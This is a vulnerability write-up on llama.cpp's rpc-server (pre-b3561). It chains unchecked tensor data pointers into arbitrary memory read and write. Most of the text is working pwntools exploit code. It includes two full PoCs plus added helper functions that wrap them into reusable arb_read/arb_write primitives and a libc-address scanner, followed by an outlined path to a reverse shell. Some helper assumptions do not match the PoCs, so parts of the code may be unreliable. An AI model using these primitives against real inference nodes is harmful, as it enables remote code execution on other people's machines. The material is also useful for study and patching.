This article was originally written by 7resp4ss of CVES Lab.
1. Overview
The vulnerability lies in the rpc-server feature of llama.cpp and is rated 9.8.
Before release b3561, llama.cpp's distributed-inference scenario contained a combination of bugs that can be chained into RCE (the research in this article is also based on the b3561 code base). Two bugs are used:
- an arbitrary address write in rpc_server::set_tensor
- an arbitrary address read in rpc_server::get_tensor
The root cause is that when tensors are sent to an inference node during distributed inference, llama.cpp performs no sanity checks on the received tensor structure, so the inference node itself can be attacked.
What is llama.cpp used for?
In one sentence: llama.cpp is a framework for large-model inference and quantization, optimized for Meta's LLaMA models. It is written in C++ and is highly portable, for example it can run large-model inference on Android phones and many other environments.
And what is distributed inference?
When a single machine does not have enough resources to run a large model, multiple machines can be clustered together for distributed inference. The official llama.cpp documentation describes the following way to set it up:
- On the auxiliary inference node, run:
bin/rpc-server -p 50052
to listen on port 50052 of 0.0.0.0.
- On the main node, run:
bin/llama-cli -m ../models/tinyllama-1b/ggml-model-f16.gguf -p "Hello, my name is" --repeat-penalty 1.0 -n 64 --rpc 192.168.88.10:50052,192.168.88.11:50052 -ngl 99
With this setup, the main node offloads part of the tensors it needs to process to the auxiliary inference nodes during inference. The vulnerability lives in this logic: a malicious attacker who connects to rpc-server can send carefully crafted data to attack the auxiliary inference node.
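Before diving into the details: the PoCs in the next section talk to rpc-server by building raw messages by hand. Judging from how they are constructed and parsed, a request is a 1-byte command id, an 8-byte little-endian payload length, and the payload, and a response is an 8-byte little-endian length followed by the body. A minimal framing helper in that spirit (pwntools, like the PoCs; the helper name rpc_request is ours):
from pwn import remote, p8, p64, u64

GET_ALIGNMENT = 1  # one of the command ids listed in the PoCs below

def rpc_request(io, cmd, payload=b''):
    # request: 1-byte command, 8-byte little-endian length, payload
    io.send(p8(cmd) + p64(len(payload)) + payload)
    out_size = u64(io.recvn(8))   # response: 8-byte little-endian length ...
    return io.recvn(out_size)     # ... followed by the response body

if __name__ == '__main__':
    io = remote("127.0.0.1", 50052)
    print(rpc_request(io, GET_ALIGNMENT).hex())
    io.close()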
2. Vulnerability Details
First, note that the data pointer member of the rpc_tensor structure can be controlled by a remotely connected user.
struct rpc_tensor {
    uint64_t id;
    uint32_t type;
    uint64_t buffer;
    uint32_t ne[GGML_MAX_DIMS];
    uint32_t nb[GGML_MAX_DIMS];
    uint32_t op;
    int32_t  op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
    int32_t  flags;
    uint64_t src[GGML_MAX_SRC];
    uint64_t view_src;
    uint64_t view_offs;
    uint64_t data;
    char     name[GGML_MAX_NAME];
    char     padding[4];
};
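To make the on-wire layout that the PoCs below assemble with flat() explicit, it can be written as a packing helper. This is a sketch: the field widths and counts follow the struct above as the PoCs interpret it (4-element ne/nb, 16 op_params, 10 src slots, a 64-byte name, no compiler padding between fields), the default values mirror the PoCs, and the function name is ours:
from pwn import p32, p64

def pack_rpc_tensor(data, buffer, ne=(0xdeadbeef,) * 4, nb=(1,) * 4,
                    type_=2, name=b'a' * 64):
    # serialize an rpc_tensor the same way the PoCs below do with flat()
    blob  = p64(1)                           # id
    blob += p32(type_)                       # type
    blob += p64(buffer)                      # buffer: must point to a valid buffer object
    blob += b''.join(p32(x) for x in ne)     # ne[4]
    blob += b''.join(p32(x) for x in nb)     # nb[4]
    blob += p32(0)                           # op
    blob += p32(0) * 16                      # op_params[16]
    blob += p32(0)                           # flags
    blob += p64(0) * 10                      # src[10]
    blob += p64(0)                           # view_src
    blob += p64(0)                           # view_offs
    blob += p64(data)                        # data: the attacker-controlled pointer
    blob += name.ljust(64, b'\x00')[:64]     # name[64]
    blob += b'x' * 4                         # padding[4]
    return blob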
By controlling the value of the data pointer, we can achieve an arbitrary address write and an arbitrary address read through the call paths below.
Arbitrary Address Write
The call chain that leads to the arbitrary address write is:
- start_rpc_server: https://github.com/ggerganov/llama.cpp/blob/75af08c475e285888f66556d0f459c533b7deb95/ggml/src/ggml-rpc.cpp#L1144
- rpc_serve_client: https://github.com/ggerganov/llama.cpp/blob/75af08c475e285888f66556d0f459c533b7deb95/ggml/src/ggml-rpc.cpp#L1060
- rpc_server::set_tensor: https://github.com/ggerganov/llama.cpp/blob/e31a4f679779220312c165b0f5994c680a610e38/ggml/src/ggml-rpc.cpp#L893
- ggml_backend_tensor_set: https://github.com/ggerganov/llama.cpp/blob/400ae6f65f0b55babd48d1e3ec7fd663a97fc8d0/ggml/src/ggml-backend.c#L221
- ggml_backend_cpu_buffer_set_tensor: https://github.com/ggerganov/llama.cpp/blob/400ae6f65f0b55babd48d1e3ec7fd663a97fc8d0/ggml/src/ggml-backend.c#L577
PoC
from pwn import *
ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10
context(arch='amd64',log_level = 'debug')
p = remote("127.0.0.1",50052)
pd = b''
cmd = p8(GET_DEVICE_MEMORY)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
p.close()
p = remote("127.0.0.1",50052)
pd = b''
cmd = p8(GET_ALIGNMENT)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content
cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
remote_ptr = u64(recv[0x18:0x20])
sz = u64(recv[0x20:0x28])
log.success(f"remote_ptr:{hex(remote_ptr)},size:{sz}")
p.recvall(timeout=1)
p.close()
'''
When the vulnerability cannot be triggered, you might want to adjust the next_ptr variable in the script to the buffer address returned by ALLOC_BUFFER.
'''
next_ptr = remote_ptr + 0x160
log.success(f'next_ptr:{hex(next_ptr)}')
p = remote("127.0.0.1",50052)
cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd = cmd + input_size + content
leak_address = remote_ptr + 0x90
#fake a rpc_tensor
rpc_tensor_pd = flat(
    {
        0: [
            0x1,                 # id
            p32(2),              # type
            p64(next_ptr),       # buffer
            [                    # ne
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
            ],
            [                    # nb
                p32(1),
                p32(1),
                p32(1),
                p32(1),
            ],
            p32(0),              # op
            [p32(0)] * 16,       # op_params (corrected from 8 to 16)
            p32(0),              # flags
            [p64(0)] * 10,       # src
            p64(0),              # view_src
            p64(0),              # view_offs
            p64(0xdeadbeef),     # data
            'a' * 64,            # name
            'x' * 4              # padding
        ],
    }
)
cmd = p8(SET_TENSOR)
content = flat(
    {
        0: [rpc_tensor_pd + p64(0) + p64(0x100),
            b'a' * 0x100]
    }
)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
p.recv(0x18)
p.close()
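For later use in the exploitation ideas at the end of this article, the PoC above can be distilled into a reusable write primitive. The sketch below replays the same request sequence and reuses rpc_request() and pack_rpc_tensor() from the earlier sketches; all names here are ours, the +0x160 offset is heap-layout dependent exactly as the PoC notes, and it assumes that every byte after the 8-byte offset field of a SET_TENSOR request is copied verbatim to the target address (under that assumption, the extra p64(0x100) in the PoC is simply the first 8 bytes that get written; if your build expects a different layout, mirror the PoC exactly):
from pwn import remote, p64, u64

# command ids, as in the PoCs
ALLOC_BUFFER, GET_ALIGNMENT, SET_TENSOR, GET_DEVICE_MEMORY = 0, 1, 6, 10
HOST, PORT = "127.0.0.1", 50052

def new_session():
    # replay the PoC's setup: warm up, learn remote_ptr, guess next_ptr,
    # and return a fresh connection that has just allocated a real buffer object
    io = remote(HOST, PORT)
    rpc_request(io, GET_DEVICE_MEMORY)               # warm-up, as in the PoC
    io.close()

    io = remote(HOST, PORT)
    rpc_request(io, GET_ALIGNMENT)
    remote_ptr = u64(rpc_request(io, ALLOC_BUFFER, p64(0x100))[:8])
    io.close()
    next_ptr = remote_ptr + 0x160                    # guessed address of the next buffer object

    io = remote(HOST, PORT)
    rpc_request(io, ALLOC_BUFFER, p64(0x100))        # allocate the object next_ptr should point to
    return io, next_ptr

def arb_write(addr, data):
    # write `data` to `addr` in the rpc-server process via SET_TENSOR
    io, next_ptr = new_session()
    fake = pack_rpc_tensor(data=addr, buffer=next_ptr)
    rpc_request(io, SET_TENSOR, fake + p64(0) + data)   # offset 0, then the bytes to write
    io.close()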
Arbitrary Address Read
The call chain that leads to the arbitrary address read is:
- start_rpc_server: https://github.com/ggerganov/llama.cpp/blob/75af08c475e285888f66556d0f459c533b7deb95/ggml/src/ggml-rpc.cpp#L1144
- rpc_serve_client: https://github.com/ggerganov/llama.cpp/blob/75af08c475e285888f66556d0f459c533b7deb95/ggml/src/ggml-rpc.cpp#L1060
- rpc_server::get_tensor: https://github.com/ggerganov/llama.cpp/blob/e31a4f679779220312c165b0f5994c680a610e38/ggml/src/ggml-rpc.cpp#L922
- ggml_backend_tensor_get: https://github.com/ggerganov/llama.cpp/blob/400ae6f65f0b55babd48d1e3ec7fd663a97fc8d0/ggml/src/ggml-backend.c#L235
- ggml_backend_cpu_buffer_get_tensor: https://github.com/ggerganov/llama.cpp/blob/400ae6f65f0b55babd48d1e3ec7fd663a97fc8d0/ggml/src/ggml-backend.c#L583C1-L587C2
PoC
from pwn import *
ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10
context(arch='amd64',log_level = 'debug')
base_memory = 0x0
p = remote("127.0.0.1",50052)
pd = b''
cmd = p8(GET_DEVICE_MEMORY)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
p.close()
p = remote("127.0.0.1",50052)
pd = b''
cmd = p8(GET_ALIGNMENT)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content
cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
remote_ptr = u64(recv[0x18:0x20])
sz = u64(recv[0x20:0x28])
log.success(f"remote_ptr:{hex(remote_ptr)},size:{sz}")
p.recvall(timeout=1)
p.close()
'''
When the vulnerability cannot be triggered, you might want to adjust the next_ptr variable in the script to the buffer address returned by ALLOC_BUFFER.
'''
next_ptr = remote_ptr + 0x160
log.success(f'next_ptr:{hex(next_ptr)}')
p = remote("127.0.0.1",50052)
cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd = cmd + input_size + content
rpc_tensor_pd = flat(
    {
        0: [
            0x1,                 # id
            p32(2),              # type
            p64(next_ptr),       # buffer
            [                    # ne
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
            ],
            [                    # nb
                p32(1),
                p32(1),
                p32(1),
                p32(1),
            ],
            p32(0),              # op
            [p32(0)] * 16,       # op_params (corrected from 8 to 16)
            p32(0),              # flags
            [p64(0)] * 10,       # src
            p64(0),              # view_src
            p64(0),              # view_offs
            p64(0xdeadbeef),     # data
            'a' * 64,            # name
            'x' * 4              # padding
        ],
    }
)
cmd = p8(GET_TENSOR)
content = flat(
    {
        0: rpc_tensor_pd + p64(0) + p64(0x100)
    }
)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
p.recv(0x18)
p.close()
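The read PoC wraps up the same way, reusing new_session(), rpc_request() and pack_rpc_tensor() from the sketches above; the GET_TENSOR payload layout (rpc_tensor, then an 8-byte offset, then an 8-byte size) is exactly the one the PoC uses:
from pwn import p64

GET_TENSOR = 7   # command id, as in the PoC

def arb_read(addr, size=0x100):
    # read `size` bytes from `addr` in the rpc-server process via GET_TENSOR
    io, next_ptr = new_session()
    fake = pack_rpc_tensor(data=addr, buffer=next_ptr)
    leaked = rpc_request(io, GET_TENSOR, fake + p64(0) + p64(size))
    io.close()
    return leaked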
3. Reproduction
Build
git clone https://github.com/ggerganov/llama.cpp.git && cd llama.cpp && git checkout b3560 && mkdir build-rpc && cd build-rpc && cmake .. -DGGML_RPC=ON && cmake --build . --config Release
pip install pwn
Environment
uname -a
Linux heckar-virtual-machine 6.8.0-40-generic #40~22.04.3-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 30 17:30:19 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
/lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.8) stable release version 2.35.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 11.4.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
Reproduce
In llama/llama.cpp/build-rpc/bin, run the following command:
./rpc-server -p 50052
Then run the PoCs above against it.
Exploitation Ideas
With two primitives this powerful, full exploitation is quite feasible. The cleanest option would be to overwrite a function pointer that llama.cpp calls at runtime, but the author did not have time to investigate that and instead went with the following traditional libc-oriented approach:
- Use the arbitrary read to leak a libc address located near the address returned by ALLOC_BUFFER, and recover the libc base (a sketch of this step follows the list).
- Find a way to forge an _IO_FILE structure.
- Find a way to overwrite the libc GOT entry that puts goes through so that it points to exit.
- rpc-server calls puts, which triggers exit, which in turn triggers the FILE/IO machinery and spawns a reverse shell.
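As a rough sketch of the first step, arb_read() from above can be pointed at memory around the address that ALLOC_BUFFER returns and the dump scanned for pointer-looking values; which of those actually lives inside libc, and at what offset from the libc base, has to be worked out once per target environment, so treat this purely as a starting point:
from pwn import u64

def find_candidate_libc_ptrs(addr, span=0x400):
    # dump `span` bytes at `addr` and list values that look like userspace
    # library pointers (a heuristic, not a guarantee that they point into libc)
    blob = arb_read(addr, span)
    candidates = []
    for off in range(0, len(blob) - 7, 8):
        val = u64(blob[off:off + 8])
        if (val >> 40) == 0x7f:      # typical range of mmap'd libraries on x86-64 Linux
            candidates.append((addr + off, val))
    return candidates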
Impact
Remote command execution and control of the inference node.
Other Notes
llama.cpp's distributed inference in fact still has other security issues. After I reported the vulnerabilities above, the maintainers marked the distributed-inference feature as experimental and stated that they will not accept further advisories about it until they have invested enough development time to stabilize it.
This article was first published on the WeChat public account 山海之关 under the title 《人工智能大模型框架核弹级漏洞复现》 (Reproducing a Nuclear-Grade Vulnerability in an AI Large-Model Framework).